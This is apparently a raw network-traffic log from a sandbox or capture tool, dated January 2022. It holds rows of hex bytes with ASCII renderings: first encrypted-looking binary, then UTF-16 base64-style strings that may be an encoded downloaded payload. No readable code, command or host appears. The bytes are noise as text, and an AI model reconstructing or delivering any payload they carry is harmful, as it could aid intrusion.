                                                                                                                                                                                                    2022-01-14 03:59:13 UTC174INData Raw: 24 e6 91 d1 07 46 1f 30 50 e6 5b e9 c6 c0 df 7e cf 3d 21 26 8c 40 c0 e7 cf 4f 3d 4f bb d3 f2 c3 d9 47 6c 59 4f 34 84 78 b0 37 36 8f 90 63 6a 23 13 3c ae 73 32 45 7c ae eb dd 60 9f d3 15 81 d3 32 ec b2 cc 32 a7 4a db 7c d4 91 2b 02 a6 e5 77 b8 6e 36 08 14 79 a3 17 d4 12 19 ee d3 6f 17 c8 8f 17 d7 1b e0 65 10 3d e9 3f 00 d0 1f 17 2b 9c 17 78 27 62 88 1e a5 6e 89 60 94 b4 ac c0 8b 8e c2 81 3d 86 6b cb c0 79 b6 cd 2e ad 4e d9 a0 4a ee 64 24 73 b6 be 36 c1 2b 1b 47 3d 21 09 4b c6 3a 17 42 a6 48 03 16 47 04 0f 08 0b 6e e5 9a 45 e7 3f a3 92 6a f2 79 55 bb 26 5c 2b 68 a4 46 d7 32 39 96 8c 75 29 fc a2 34 9b 6b d6 c3 d2 2a 4a e5 d3 54 be 4d 6a 09 e0 c1 91 09 9b bb d6 fc 38 82 38 d3 02 9d 27 3a 76 b7 2c ec 21 72 b1 fb f9 bf 55 fc eb 31 61 a9 6f 15 a2 8f ff 5b c0 d2
                                                                                                                                                                                                    Data Ascii: $F0P[~=!&@O=OGlYO4x76cj#<s2E|`22J|+wn6yoe=?+x'bn`=ky.NJd$s6+G=!K:BHGnE?jyU&\+hF29u)4k*JTMj88':v,!rU1ao[
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC178INData Raw: c2 cb 5a 6f 81 df 21 37 09 18 b3 53 f6 d6 80 f7 20 a4 d3 7a 45 32 46 70 43 7c 01 9b 1f 82 9a 4e 33 48 94 57 d4 28 6f 9d 69 04 9d cc 5b 25 1b bc ed ca 04 4e 7a 05 46 72 f4 9e d8 be 22 c7 3d 0a 56 ec 33 02 7e bb 4e 71 c4 77 0a 32 db 6f 50 71 c6 e1 da e7 76 8e f8 73 f6 62 70 e0 a0 95 85 47 55 8b ab ad 55 9c 03 d7 88 3f fa c9 ee d3 f3 23 70 1e 26 69 04 d7 23 a2 e6 2a 61 d3 bf 26 1a 33 66 84 78 01 dd d4 a8 32 b8 5b 31 5f e7 02 e6 a5 46 ed fe 36 27 7e e3 5a e6 cf 3d e6 c0 5a 31 f5 fc c1 8c 4c 6e 0e 28 b7 3c cb de 91 cf f4 79 1a 38 42 95 91 3e f6 c2 10 4c e3 19 c2 c9 e7 25 0f 8c c5 61 43 c2 d9 02 da 5e 77 7b d7 c3 51 b3 ab 2d 49 3a a1 6d 19 1c b8 4e 26 73 19 1f 52 37 a2 64 91 94 b9 49 6e e7 e4 0f dc 71 42 de 7d b2 c6 5f f4 a9 c1 e7 08 61 11 fc 13 8e dc 50 74 92
                                                                                                                                                                                                    Data Ascii: Zo!7S zE2FpC|N3HW(oi[%NzFr"=V3~Nqw2oPqvsbpGUU?#p&i#*a&3fx2[1_F6'~Z=Z1Ln(<y8B>L%aC^w{Q-I:mN&sR7dInqB}_aPt
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC182INData Raw: 8b 6f 93 89 28 5e 56 c6 b2 6c 84 43 56 34 1b d9 88 4e 2e 9c 48 1b e2 35 15 b1 45 57 b0 27 f2 36 0b 0e 34 d2 32 ea 63 f9 5d 69 ba c8 6c 5f 43 cb f9 37 eb 41 c8 ad 8d 63 40 87 52 f1 e6 5f d0 8a fe 65 d3 ee 46 e1 b8 58 c4 9a d1 7e a7 18 fe 38 1d 7a cd ba eb 38 4e 84 2a 07 46 bc 12 80 58 08 f3 63 bd ea 23 7d e8 02 c4 2d aa fc bd 08 96 32 02 7b 0f 34 47 25 e0 7d bd f0 33 d8 79 06 07 33 3e ab d2 7a 87 bb 85 9e d2 cf a9 90 1c d7 9e c0 61 a2 4a f8 f3 95 23 f0 38 94 72 f0 15 9e ee bf d2 b8 6f d2 3e fe 08 1c a7 b8 08 c3 d9 db 12 45 45 cd 2f 77 c6 d4 34 f7 9c ce 23 87 b6 bf 71 fb 16 0f 97 f9 c0 46 dc 89 d5 5c aa 93 36 47 9e 4d 60 02 78 d9 1e 1d 70 20 3c 24 fa 87 19 06 22 9c a5 85 0a ae dc 2c d1 bf ac 84 c2 44 93 37 e3 0a cf 73 93 11 c3 ed d1 a2 4b 8c 32 20 25 cd 70
                                                                                                                                                                                                    Data Ascii: o(^VlCV4N.H5EW'642c]il_C7Ac@R_eFX~8z8N*FXc#}-2{4G%}3y3>zaJ#8ro>EE/w4#qF\6GM`xp <$",D7sK2 %p
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC186INData Raw: 57 eb 31 0a e9 d8 78 65 11 a4 a0 b1 b9 90 28 5f f7 67 05 d4 9b ff 58 ea 9a fe a1 35 8f cb 06 a3 8d 98 9b 49 7a 4d 3c be 03 32 9c 0e 7e c4 b4 a4 bf f7 8f ea 97 43 17 84 ca 6c ea 2b a2 28 93 87 ce 80 72 bc 4a 03 56 ae 3d 52 3a 18 c8 90 ba d7 03 d0 14 94 c2 27 90 bb 2d d7 fe 58 f3 c2 ad 6c f6 fa df 70 6c e6 b9 64 96 37 80 46 b0 c9 32 9d 1b ef 5c 3b bb 62 e7 51 a9 ea 0e 88 64 d4 1a b2 ae 48 a8 14 5b 55 f0 b9 ee ee 34 a0 90 6d ef b9 f3 ba 91 5b cd 83 73 7c 77 69 e0 0d 1a 8a d8 b2 b9 3b 2a 9c 22 33 ac c7 ff 8b d2 1b 73 c2 30 6d 77 dd 32 17 39 b9 a6 50 58 4e 3b b1 df ef 1d 72 ac ff 32 29 0c 51 98 4b 7e 81 25 35 5b fe 68 77 27 e2 30 bd 92 42 30 08 b5 a3 8e 16 68 02 c9 ed ed 79 b3 1b cd f9 a3 86 23 70 39 57 90 63 a4 aa e9 9b 69 11 5f b6 d4 2b 45 bd bd 77 39 e9 4e
                                                                                                                                                                                                    Data Ascii: W1xe(_gX5IzM<2~Cl+(rJV=R:'-Xlpld7F2\;bQdH[U4m[s|wi;*"3s0mw29PXN;r2)QK~%5[hw'0B0hy#p9Wci_+Ew9N
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC191INData Raw: 6c 33 14 8a f8 f3 b9 48 72 f4 3a 92 59 fa 9c 94 a5 0a a3 1a d2 80 f8 20 52 76 e5 37 b3 15 a8 c3 c5 42 72 22 c5 4f 20 28 81 dc 70 eb db 56 6d f5 49 83 af 0b bd 04 20 c9 6c f3 20 eb 42 03 71 26 05 bd 4e ae eb 71 fc 39 9f a5 6b 39 10 55 74 4c b0 12 10 2e a5 ed e8 9b ef d0 56 d1 1e 88 b3 b6 f4 72 3f c1 29 e4 5d 3f 63 3e bc f0 b2 fe 0c 54 9e ca 28 e2 c5 b6 ff bc 7f d6 01 c4 c8 be 31 de 65 ce cb 21 f4 25 49 78 eb 2e b0 b8 fc e8 63 f0 3f 48 6a 8c 72 4a 99 e7 8b 88 6f 16 f3 f4 e1 78 2d 26 77 4e 4a a0 d5 92 a0 ae 21 90 3d 4f 44 9f c3 47 fa 08 29 6c fe f1 fb 86 75 ea 3e b0 07 6f d0 16 eb d4 42 02 19 76 b9 8d e7 60 71 f0 fa cd 1a 05 5e b2 78 9e cd d1 86 42 28 c3 00 25 e0 a1 35 da 3c fd 8e 4a 1b a2 a4 4f 77 86 cb 98 f0 c2 b8 37 d8 db 2e af 07 1a fc 76 5c 5d b7 33 95
                                                                                                                                                                                                    Data Ascii: l3Hr:Y Rv7Br"O (pVmI l Bq&Nq9k9UtL.Vr?)]?c>T(1e!%Ix.c?HjrJox-&wNJ!=ODG)lu>oBv`q^xB(%5<JOw7.v\]3
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC194INData Raw: 4e 31 31 67 04 38 52 00 3f 35 52 5e d3 17 ff 13 15 65 8a c9 3f a2 bf 5e 48 56 26 08 5a 7d f9 86 15 ee 17 8c a7 b4 2c 71 ce 0e 3f 64 6f e0 77 ca ab 6c 06 72 67 09 3f 53 a5 e1 db a0 b5 60 7f 3a 13 74 80 f5 59 08 67 ed 4f 72 18 d8 2e d4 de 3e 1f a8 a2 ce 1e 33 95 15 3f 44 44 33 88 c5 72 8d ad 86 36 f8 7b 3e 92 7b 44 e1 4a 80 51 58 9b bd f1 9e e3 58 47 22 77 8d a7 f9 30 da fa a3 e4 10 58 82 af 5b 56 cc c5 d8 4e 30 f5 fb 41 e2 f9 8b 70 fd 8b 21 da 06 9b 97 c8 4b 40 2f 0f d1 b3 cc 19 04 a3 30 b6 0c 8a cd 3d 70 4d ca a3 d7 29 3a 5a 45 40 ad 53 7a 26 da a7 71 3f 65 7a 75 03 a7 0a ff 45 26 49 02 c7 c4 09 57 e7 97 7f e2 58 4b ba bf d9 c2 d9 df d5 21 04 b2 a6 42 48 1a 13 16 54 99 c4 88 6b 35 42 31 a2 5f 89 e8 8a 46 96 37 59 c1 0c f1 c4 4f d0 33 59 81 df 2a 23 4c df
                                                                                                                                                                                                    Data Ascii: N11g8R?5R^e?^HV&Z},q?dowlrg?S`:tYgOr.>3?DD3r6{>{DJQXXG"w0X[VN0Ap!K@/0=pM):ZE@Sz&q?ezuE&IWXK!BHTk5B1_F7YO3Y*#L
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC198INData Raw: 87 9d 8f 8e da 27 07 57 0f 11 61 94 bd 3d 05 8a 39 e5 07 93 3c 26 2e 7b 72 c1 c3 52 f1 fa 0d 6f 2f fa 28 0d 51 86 64 9c a0 e8 29 c7 73 b5 2f 56 bc 6f 0c a4 c0 81 cf 71 3e fd e5 84 18 02 d8 07 42 c1 53 2d 40 84 3e 5a f3 e4 69 07 33 91 2f 39 b7 19 85 df a2 2b dd a0 d3 eb 07 ce b8 0b 5b 8a 21 a1 fe 89 30 4b 88 e7 8e 7a d1 53 2c b1 31 41 c0 64 7e fd c4 f2 8d fd 0d 4d 62 a6 b0 44 cb 92 26 32 95 29 5a 3f e0 58 9c cd 81 10 9c 6c 3e 76 fb 69 e5 54 e1 36 e9 64 c2 07 87 75 07 6f 4f d8 b6 57 d9 5d ec 3e 36 c7 64 b1 74 04 9a 4d 80 ac e8 96 77 f3 27 9b 88 6f cd 2a 8f ed 4a 7f 00 66 88 18 e5 2e 0b 3a d5 bc 41 b6 96 ad c0 4d 6b ac 0e d9 a3 b6 57 3b c0 db e7 77 e6 d1 e2 89 0f 5a ce d8 b9 1d 65 d3 af 04 7c 52 53 9f 4f 3a 72 db 38 25 2a ca 48 4b 5f 1f 6d 31 f1 6a 54 b1 66
                                                                                                                                                                                                    Data Ascii: 'Wa=9<&.{rRo/(Qd)s/Voq>BS-@>Zi3/9+[!0KzS,1Ad~MbD&2)Z?Xl>viT6duoOW]>6dtMw'o*Jf.:AMkW;wZe|RSO:r8%*HK_m1jTf
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC202INData Raw: 31 ff 68 48 9d 80 25 d9 02 1b ae 8b 3b 6e de 0f 18 af 5b a4 13 82 e5 6f 16 8a 28 8a 84 f7 d1 4e 5d fe 79 83 59 6c a9 d7 44 a3 fa fe 7e ae 03 04 b9 f2 35 90 c2 dd 77 a3 69 bb ca cc 08 48 d5 88 0b e1 7d 13 9d 73 ba 8d f2 65 63 ba 13 17 a0 b0 06 38 e3 b0 7d d1 f6 fe 86 d6 6a 25 31 09 33 4e 04 05 21 df e4 77 c4 01 a7 41 81 40 db 96 96 e4 80 f2 b2 c4 31 5d 3d c1 b1 76 93 f4 09 c2 44 6c e8 8f ce aa a1 6f eb c7 5d 3e 50 75 d7 85 ea 4d 63 64 ef 64 20 1b b4 d4 07 a7 5a 7e ce 54 83 8c 68 52 d5 a4 b5 df 82 e5 6c c6 aa 81 eb 61 f6 24 84 ad 8f 3c 69 9e 1b cd 6e 05 43 3a 08 95 93 39 79 eb 06 9a 66 12 65 b5 3e 97 25 bf 78 aa ac 7c 41 4b d4 20 de 73 db 3c 2f 32 50 c3 36 48 64 00 a0 5d 97 b8 d1 91 af 07 a7 67 ea 2f 22 0e 71 d6 f5 72 c2 c5 68 78 3f b0 86 ec 90 20 b0 b3 f6
                                                                                                                                                                                                    Data Ascii: 1hH%;n[o(N]yYlD~5wiH}sec8}j%13N!wA@1]=vDlo]>PuMcdd Z~ThRla$<inC:9yfe>%x|AK s</2P6Hd]g/"qrhx?
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC206INData Raw: e0 c9 cd b4 17 66 3c b0 3a 85 fc 54 f2 1a 6c db 4e f2 69 43 ff 7f bd 32 02 aa 11 be 4a d6 ce 71 6f 97 ca a5 8f 2d da 97 80 3c 7f 37 f6 3d 1d 42 44 da 5c 77 2d f9 ae a8 bf 23 b6 1c c6 f7 25 40 1e 95 ac ee 24 15 80 40 76 91 a1 76 1b 48 2c 9b fe f2 34 ad b8 6e cb c3 51 91 88 e9 1e 39 ea 20 e2 9e 7c c3 dc 96 af 93 ce 7d bd 55 86 ae f8 e0 a5 e4 6f 0b d4 6f 7a 32 98 0e 98 b5 eb e9 28 25 fa cb 6b ab 23 6a 59 28 42 d0 87 57 c6 c3 6a eb 30 a1 ff 1c 50 a4 dc da fc 67 d2 e7 64 3a c6 c7 a2 47 7f 78 4a d9 fa 7c fd c1 96 18 98 9a 66 7e ce 86 e4 b5 e8 4c 87 df 96 9a ff 12 5a bb f1 05 73 5e 18 30 94 dc c5 e0 63 c7 c8 02 c7 71 2a f9 e1 2d 53 d7 53 97 d6 bf 92 6b b8 5c 81 ce 5b a6 06 e6 23 0e 91 a8 7e b1 9a 48 94 ac e9 ca a0 e1 55 e3 71 97 db 10 a3 10 12 20 b5 cd 08 94 0f
                                                                                                                                                                                                    Data Ascii: f<:TlNiC2Jqo-<7=BD\w-#%@$@vvH,4nQ9 |}Uooz2(%k#jY(BWj0Pgd:GxJ|f~LZs^0cq*-SSk\[#~HUq
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC210INData Raw: 84 a1 7f 94 87 ee 95 6b 57 e6 36 41 89 40 8b 02 00 b7 6f b2 67 24 f1 65 96 a3 73 2d 00 cb 10 bf c1 33 d3 01 2c 5a 97 10 fc ad e6 89 d0 01 4c ad 76 6b d1 86 87 8b 38 76 25 be 35 89 1c 68 ac 5d 07 18 87 cb 41 b6 ee c2 32 58 11 f5 06 9c 84 e4 ee 53 23 2f 31 04 67 56 41 34 97 e2 d8 6a 20 4a 90 57 08 d4 29 62 61 ba 3c b0 f1 4c bc 3c f7 2a e1 d5 3a 5d 50 02 01 88 c9 7b 08 db 92 fa 5b ba 84 04 5b 37 e3 33 f7 ef 3c 7f 95 d3 35 8e 47 8e 0b 5e c6 30 ee 81 83 77 c9 e1 e8 94 c1 e3 01 97 93 f6 2b b1 7e c2 5d 4d 6b 4b f0 a5 09 7b 7b ce b6 2c 8b 95 32 83 65 70 b6 f9 23 89 fe be a8 2e 14 31 d0 41 44 41 97 01 46 31 92 5b 0a 83 98 61 b5 ec 96 cd 45 a8 f0 30 49 a9 2c 15 05 05 e9 a6 6a 74 06 b3 34 6f e2 01 ec c3 82 74 77 6c e0 47 bf 7a 9a 67 f1 a2 2d 9a b1 07 f5 b0 0d 45 37
                                                                                                                                                                                                    Data Ascii: kW6A@og$es-3,ZLvk8v%5h]A2XS#/1gVA4j JW)ba<L<*:]P{[[73<5G^0w+~]MkK{{,2ep#.1ADAF1[aE0I,jt4otwlGzg-E7
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC214INData Raw: fd c1 5b 0a a3 e4 53 01 dd 3c 7c a7 f6 d9 a9 b3 72 f2 0c 1c 71 c0 73 06 6b d3 70 9d 66 97 7a 09 96 06 2e f9 6a 5b 39 6a cb 91 b3 fd a9 20 e0 8e 82 27 71 0f 9e 79 38 e2 24 47 cc 9e e0 6a 43 ff 2d ad bb 5f d9 b5 ac 24 10 a9 56 68 ea 41 22 3d 29 e5 83 ab d4 5b 72 bf ca 67 41 f0 1c 4e c3 52 21 79 be 03 b3 e9 74 7a 75 d9 cd e2 73 1e b4 8f fc 1a 17 4e 4e 98 b9 4a a0 ff 89 74 37 56 c8 4d d8 af 29 d3 df 0a ba a6 c9 33 1a 35 32 c3 f6 a5 45 35 f2 4c 62 a2 3a 2a b1 89 ef ae 37 4d 6e 70 a0 b1 9d 6d 76 65 00 36 27 cb 10 fc 8e 00 ff 32 93 4b 9d 10 67 f6 b8 89 56 c7 72 f8 ab 4e 24 f5 56 7c 32 c1 7a 18 60 af 6c 45 74 23 97 e2 6b 9d e8 7b dc 4f ad cc 3c 14 59 ed 9e 57 86 b0 b7 25 bd 4a 11 88 e1 8f 1a f0 e2 4a 96 94 61 7c d3 ee 0d cd 44 d6 0b 21 9c d9 17 33 c9 7d 2b 51 af
                                                                                                                                                                                                    Data Ascii: [S<|rqskpfz.j[9j 'qy8$GjC-_$VhA"=)[rgANR!ytzusNNJt7VM)352E5Lb:*7Mnpmve6'2KgVrN$V|2z`lEt#k{O<YW%JJa|D!3}+Q
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC226INData Raw: 65 69 48 46 3b 1c 95 c8 1e c0 fb de 9c 75 2d f8 c7 06 fa b6 86 35 86 7e fe 99 41 dc 40 7a 11 65 b6 2e 05 5f c4 b0 b1 b3 3d 70 9a 5d 44 62 f8 14 a7 c5 07 24 ee 45 75 fe eb e6 d3 a3 6f 6c ff 77 d2 7e 51 af 93 1d 48 0e 57 8c 98 d8 a9 6f b9 00 6e 73 55 bd d1 6c 66 d6 d1 27 1b 95 d8 be e9 07 73 05 f1 45 e2 29 41 5c 41 c9 cc 92 17 63 98 2c 8c d6 8d 26 95 b9 63 e3 20 07 da 9b a2 ce 5d ee f6 a3 71 f7 12 9b ef 1e df 00 ab a7 8c 10 87 4e ca 54 7c 7d 38 22 77 98 09 5c 33 e9 c9 ea 04 71 b3 75 78 4b d8 fd 67 84 52 f4 70 97 77 cb 2b 0f 56 b7 b9 21 85 27 8e 94 d3 7e be 32 a3 4f bd b1 e1 7f 95 a4 56 71 a5 a6 2e a3 bf 3f 90 18 ff 66 d2 d4 71 16 e6 48 32 1c 37 63 5d 5d 12 8b ea fd 98 65 da b8 ad a2 36 71 23 5e b1 2d 2c 56 d1 53 c1 f4 90 04 8b 05 38 7f 1b d0 ae f0 a0 34 b2
                                                                                                                                                                                                    Data Ascii: eiHF;u-5~A@ze._=p]Db$Euolw~QHWonsUlf'sE)A\Ac,&c ]qNT|}8"w\3quxKgRpw+V!'~2OVq.?fqH27c]]e6q#^-,VS84
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC230INData Raw: 17 22 9e 50 6f de 9c f1 3a f4 18 94 aa 33 5e 1b 36 e8 a5 a7 37 ad b3 e0 db b3 e7 d2 d5 67 1a e5 55 29 5b 5d 46 0d 0a f4 10 6c b5 77 a4 59 01 f6 07 f9 44 e1 c9 7a a8 54 78 7d ad a8 5e db 11 8f 37 2a dd 39 39 35 7a ec f8 60 ae af 42 51 b5 c5 2b 31 d0 8d 64 05 1c a8 36 3c 73 c2 a8 21 30 b6 e5 0e 2a 64 e5 41 1d 0d c1 c2 2c e8 f5 3f e1 78 24 92 c0 8a 19 4e 4b 68 47 23 0f 91 82 23 bf 8f 0e 06 50 ff 2c 33 89 a8 52 5d 97 0a 5e 7d 7b cd f6 f0 e1 df ae 23 08 a2 29 94 23 34 96 76 69 a6 31 f4 cc 9d 88 e0 f3 20 ea 33 d0 af b1 73 be 3e a8 dc 89 62 87 9f d8 f0 1f b2 66 42 47 65 91 0f 76 fc 87 ab d8 99 21 7d d7 26 72 6d d9 7e f0 0c df 46 17 ca 5a 31 45 ef 35 1b 03 5a 08 f3 dc 1c b6 5e b6 ba b0 fa 6e 8e a1 c5 15 bc 37 80 b6 12 37 7e d5 1c f5 db 36 bb bb 54 20 31 43 57 4a
                                                                                                                                                                                                    Data Ascii: "Po:3^67gU)[]FlwYDzTx}^7*995z`BQ+1d6<s!0*dA,?x$NKhG##P,3R]^}{#)#4vi1 3s>bfBGev!}&rm~FZ1E5Z^n77~6T 1CWJ
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC246INData Raw: a8 c8 bb 40 7f 88 af da bb 70 c4 5a 25 e9 06 99 42 80 1f 25 9e 88 d3 4b cb 35 7b 4f 0b 30 c5 bf 42 c0 cc b1 41 33 8e 39 cc 3b 6d 8e 04 49 fc c5 dd 5e 50 35 c2 a5 94 41 3d ff 9d 1b 31 3b 5a e4 6b 5e d5 30 dc 3e 73 d8 54 9f 6f 42 2b 3a 9b 54 4f 47 4c 90 8b 77 bf 3f 49 08 87 7e 86 74 f3 68 23 ba c8 d9 8f c4 d1 6c 11 e2 d1 05 31 9b ed 24 44 4f 38 9c ea 25 de 2a 71 3e c5 ee 0e ee b9 dc db 87 98 8d 85 81 f1 d4 72 93 80 30 1f 3a 5a 09 22 6c 5d 2c 66 89 75 51 f0 b4 42 6e 5e dc 9c c8 0b fd 5a 0b e2 41 1c 5f 1d 50 4f 58 f7 74 09 05 5e f2 6a 84 fc 6d 13 63 0c 16 1f d1 e7 6a d0 e8 de a4 03 6e 62 33 fa 64 14 40 6d fa e9 f8 fa 01 2d b7 a1 cc 30 72 4c e9 e8 22 7c bf b9 bf a0 c0 51 2c 22 fb 3b bb ba 4f 0a 82 18 11 1f 47 3a 3d 84 54 b8 8a 86 85 e4 98 ca 64 85 7b d4 27 bd
                                                                                                                                                                                                    Data Ascii: @pZ%B%K5{O0BA39;mI^P5A=1;Zk^0>sToB+:TOGLw?I~th#l1$DO8%*q>r0:Z"l],fuQBn^ZA_POXt^jmcjnb3d@m-0rL"|Q,";OG:=Td{'
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC258INData Raw: 00 4e 00 48 00 63 00 33 00 64 00 47 00 68 00 43 00 55 00 7a 00 4f 00 5a 00 64 00 4a 00 4a 00 50 00 47 00 66 00 4d 00 67 00 4f 00 69 00 4a 00 6c 00 6c 00 73 00 4d 00 53 00 58 00 4d 00 67 00 31 00 74 00 73 00 66 00 52 00 32 00 6f 00 46 00 6d 00 59 00 76 00 30 00 34 00 43 00 48 00 59 00 55 00 6d 00 67 00 41 00 73 00 74 00 46 00 4e 00 45 00 6e 00 38 00 67 00 50 00 71 00 41 00 4f 00 33 00 2b 00 78 00 32 00 53 00 41 00 64 00 78 00 30 00 4c 00 52 00 51 00 56 00 5a 00 6e 00 6a 00 5a 00 41 00 69 00 50 00 4b 00 46 00 6a 00 47 00 4d 00 52 00 41 00 52 00 4b 00 4f 00 32 00 46 00 79 00 75 00 34 00 59 00 34 00 63 00 36 00 37 00 78 00 50 00 52 00 2b 00 62 00 4c 00 6d 00 67 00 51 00 30 00 37 00 41 00 65 00 49 00 47 00 35 00 65 00 58 00 4d 00 6e 00 41 00 74 00 36 00 34 00
                                                                                                                                                                                                    Data Ascii: NHc3dGhCUzOZdJJPGfMgOiJllsMSXMg1tsfR2oFmYv04CHYUmgAstFNEn8gPqAO3+x2SAdx0LRQVZnjZAiPKFjGMRARKO2Fyu4Y4c67xPR+bLmgQ07AeIG5eXMnAt64
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC274INData Raw: 00 45 00 50 00 45 00 4a 00 37 00 39 00 78 00 76 00 55 00 42 00 52 00 6c 00 6f 00 6a 00 6a 00 61 00 47 00 63 00 43 00 78 00 59 00 2f 00 50 00 54 00 74 00 5a 00 50 00 45 00 38 00 44 00 70 00 64 00 71 00 50 00 2f 00 4d 00 51 00 69 00 38 00 4d 00 32 00 52 00 59 00 34 00 77 00 2b 00 62 00 4b 00 63 00 4a 00 43 00 58 00 4d 00 33 00 43 00 5a 00 65 00 7a 00 37 00 54 00 51 00 31 00 54 00 6b 00 35 00 45 00 57 00 41 00 45 00 59 00 2b 00 75 00 30 00 61 00 4e 00 43 00 47 00 63 00 38 00 76 00 67 00 57 00 53 00 39 00 36 00 6a 00 61 00 56 00 4b 00 4d 00 4c 00 30 00 2b 00 61 00 4f 00 35 00 54 00 71 00 4f 00 43 00 6f 00 64 00 48 00 2f 00 58 00 2b 00 43 00 78 00 48 00 55 00 44 00 6b 00 63 00 4d 00 4b 00 47 00 45 00 4f 00 4c 00 5a 00 70 00 2f 00 33 00 67 00 2b 00 46 00 6a 00
                                                                                                                                                                                                    Data Ascii: EPEJ79xvUBRlojjaGcCxY/PTtZPE8DpdqP/MQi8M2RY4w+bKcJCXM3CZez7TQ1Tk5EWAEY+u0aNCGc8vgWS96jaVKML0+aO5TqOCodH/X+CxHUDkcMKGEOLZp/3g+Fj
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC290INData Raw: 00 50 00 45 00 2b 00 6c 00 72 00 64 00 61 00 32 00 31 00 73 00 55 00 71 00 4c 00 47 00 61 00 70 00 48 00 48 00 4e 00 76 00 54 00 42 00 4c 00 66 00 7a 00 58 00 35 00 56 00 64 00 61 00 72 00 65 00 6c 00 6c 00 50 00 52 00 39 00 57 00 79 00 6f 00 4d 00 49 00 56 00 4c 00 48 00 65 00 55 00 48 00 75 00 33 00 43 00 35 00 48 00 78 00 6d 00 2b 00 77 00 6b 00 50 00 34 00 6c 00 6c 00 41 00 36 00 41 00 62 00 4f 00 41 00 52 00 4a 00 46 00 74 00 6b 00 76 00 68 00 78 00 48 00 46 00 6e 00 75 00 75 00 56 00 30 00 61 00 34 00 66 00 32 00 6b 00 32 00 7a 00 4e 00 2b 00 37 00 57 00 71 00 64 00 30 00 6b 00 35 00 33 00 31 00 42 00 71 00 65 00 45 00 31 00 5a 00 50 00 34 00 54 00 43 00 63 00 38 00 51 00 54 00 31 00 35 00 4b 00 76 00 42 00 44 00 4e 00 73 00 55 00 39 00 57 00 2b 00
                                                                                                                                                                                                    Data Ascii: PE+lrda21sUqLGapHHNvTBLfzX5VdarellPR9WyoMIVLHeUHu3C5Hxm+wkP4llA6AbOARJFtkvhxHFnuuV0a4f2k2zN+7Wqd0k531BqeE1ZP4TCc8QT15KvBDNsU9W+
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC306INData Raw: 00 37 00 38 00 53 00 6a 00 63 00 74 00 73 00 57 00 68 00 72 00 46 00 44 00 57 00 34 00 69 00 51 00 78 00 37 00 63 00 4e 00 79 00 44 00 62 00 31 00 41 00 38 00 34 00 43 00 2f 00 68 00 74 00 54 00 2b 00 6a 00 67 00 70 00 52 00 55 00 4c 00 75 00 51 00 75 00 6c 00 34 00 79 00 52 00 36 00 4e 00 4e 00 32 00 50 00 4c 00 44 00 4d 00 31 00 79 00 43 00 68 00 42 00 4d 00 66 00 46 00 64 00 65 00 32 00 43 00 43 00 46 00 69 00 4e 00 43 00 61 00 4f 00 38 00 43 00 52 00 74 00 79 00 6e 00 54 00 64 00 36 00 4e 00 77 00 52 00 6e 00 5a 00 74 00 74 00 6e 00 64 00 51 00 6a 00 54 00 5a 00 33 00 79 00 44 00 50 00 4f 00 44 00 32 00 59 00 73 00 33 00 5a 00 37 00 41 00 35 00 7a 00 2b 00 44 00 71 00 6d 00 69 00 44 00 64 00 4f 00 31 00 62 00 31 00 4c 00 75 00 55 00 66 00 33 00 54 00
                                                                                                                                                                                                    Data Ascii: 78SjctsWhrFDW4iQx7cNyDb1A84C/htT+jgpRULuQul4yR6NN2PLDM1yChBMfFde2CCFiNCaO8CRtynTd6NwRnZttndQjTZ3yDPOD2Ys3Z7A5z+DqmiDdO1b1LuUf3T
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC322INData Raw: 00 73 00 4a 00 6d 00 74 00 75 00 74 00 4a 00 58 00 32 00 64 00 71 00 57 00 6b 00 69 00 52 00 69 00 37 00 63 00 34 00 48 00 6c 00 45 00 75 00 50 00 70 00 43 00 78 00 75 00 52 00 31 00 47 00 70 00 46 00 70 00 39 00 36 00 45 00 69 00 67 00 7a 00 62 00 47 00 63 00 7a 00 61 00 69 00 4b 00 54 00 66 00 38 00 37 00 34 00 73 00 73 00 42 00 30 00 46 00 6e 00 44 00 64 00 70 00 32 00 68 00 31 00 38 00 57 00 4a 00 42 00 38 00 6a 00 72 00 33 00 75 00 2f 00 2f 00 43 00 59 00 6f 00 42 00 49 00 62 00 41 00 50 00 46 00 42 00 58 00 4f 00 6f 00 4c 00 7a 00 63 00 69 00 7a 00 67 00 6e 00 4d 00 4a 00 66 00 41 00 69 00 6f 00 4a 00 31 00 51 00 64 00 4a 00 45 00 6a 00 58 00 6a 00 4b 00 59 00 68 00 77 00 55 00 57 00 2f 00 73 00 53 00 42 00 41 00 6a 00 76 00 34 00 51 00 54 00 76 00
                                                                                                                                                                                                    Data Ascii: sJmtutJX2dqWkiRi7c4HlEuPpCxuR1GpFp96EigzbGczaiKTf874ssB0FnDdp2h18WJB8jr3u//CYoBIbAPFBXOoLzcizgnMJfAioJ1QdJEjXjKYhwUW/sSBAjv4QTv
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC338INData Raw: 00 34 00 48 00 55 00 63 00 6e 00 4f 00 68 00 65 00 73 00 46 00 30 00 66 00 4a 00 46 00 41 00 68 00 50 00 6a 00 31 00 36 00 7a 00 6b 00 36 00 49 00 5a 00 4f 00 4e 00 68 00 44 00 63 00 4b 00 79 00 62 00 53 00 38 00 59 00 6c 00 47 00 57 00 75 00 37 00 31 00 70 00 2f 00 70 00 6b 00 31 00 63 00 67 00 65 00 48 00 54 00 45 00 72 00 55 00 34 00 76 00 61 00 75 00 33 00 4b 00 6e 00 33 00 42 00 6b 00 33 00 59 00 4f 00 4a 00 6f 00 67 00 74 00 4e 00 6d 00 64 00 72 00 59 00 6b 00 30 00 2b 00 48 00 57 00 35 00 6d 00 31 00 46 00 77 00 47 00 70 00 4d 00 4d 00 62 00 31 00 6a 00 63 00 51 00 4a 00 79 00 31 00 4e 00 46 00 64 00 66 00 74 